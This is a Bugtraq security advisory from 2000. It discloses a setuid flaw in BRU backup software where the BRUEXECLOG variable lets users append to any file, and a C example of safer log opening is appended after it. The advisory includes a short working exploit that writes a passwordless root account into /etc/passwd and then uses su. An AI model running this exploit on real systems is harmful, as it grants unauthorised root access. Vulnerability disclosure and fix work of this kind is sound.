[15230] in bugtraq


BRU Vulnerability

daemon@ATHENA.MIT.EDU (root)
Tue Jun 6 18:28:38 2000

Message-Id:  <393D6B8F.B2099152@gte.net>
Date:         Tue, 6 Jun 2000 14:22:24 -0700
Reply-To: root <comsec.admin@GTE.NET>
From: root <comsec.admin@GTE.NET>
To: BUGTRAQ@SECURITYFOCUS.COM

We have found a vulnerability in BRU during our 'Security Contest' for
our company.

The details are included.


--

Riley Hassell
Network Security
Speakeasy Networks

1-206-728-9770 ext151

1-206-917-5151 Direct Line



BRU backup software Vulnerability:

	Description:
		You can change the log file BRU uses by changing the
		BRUEXECLOG environment variable. Since bru is setuid
		root you can append to any file on the system.

	Exploitation:

		$ BRUEXECLOG=/etc/passwd
		$ export BRUEXECLOG
		$ bru -V '
		> comsec::0:0::/:/bin/sh
		> '
		$ su comsec
		#


	Temporary fix:
		Why do normal users need to run bru? ;)





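The root cause in the advisory above is a setuid program opening a path taken from the environment with its own privileges. The following is an added example, not part of the original post and not BRU's code, showing one way a setuid program can open such a log safely; `DEFAULT_LOG`, `open_log` and `open_exec_log` are hypothetical names chosen for illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical fixed log location; not BRU's real default. */
#define DEFAULT_LOG "/var/log/example-backup.log"

/* Open an append-only log. With as_invoker set, the open() runs under the
 * real uid, so the kernel enforces the invoking user's file permissions.
 * Returns an fd, or -1 on error or refusal. */
int open_log(const char *path, int as_invoker)
{
    uid_t saved = geteuid();
    struct stat st;
    int fd;

    if (as_invoker && seteuid(getuid()) != 0)
        return -1;
    fd = open(path, O_WRONLY | O_APPEND | O_CREAT | O_NOFOLLOW | O_NONBLOCK, 0600);
    if (as_invoker && seteuid(saved) != 0) {   /* fail closed */
        if (fd >= 0)
            close(fd);
        return -1;
    }
    if (fd >= 0 && (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode))) {
        close(fd);                              /* devices, FIFOs, dirs */
        return -1;
    }
    return fd;
}

/* A path taken from the environment is user input: open it with the user's
 * rights. Only the built-in path is opened with the program's own rights. */
int open_exec_log(const char *env_value)
{
    if (env_value != NULL && env_value[0] == '/')
        return open_log(env_value, 1);
    return open_log(DEFAULT_LOG, 0);
}

int main(void)
{
    int fd = open_exec_log(getenv("BRUEXECLOG"));
    printf("log fd: %d\n", fd);
    if (fd >= 0)
        close(fd);
    return fd >= 0 ? 0 : 1;
}
```

Only the effective uid is switched here; a setgid program would switch the effective gid around the `open()` in the same way.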
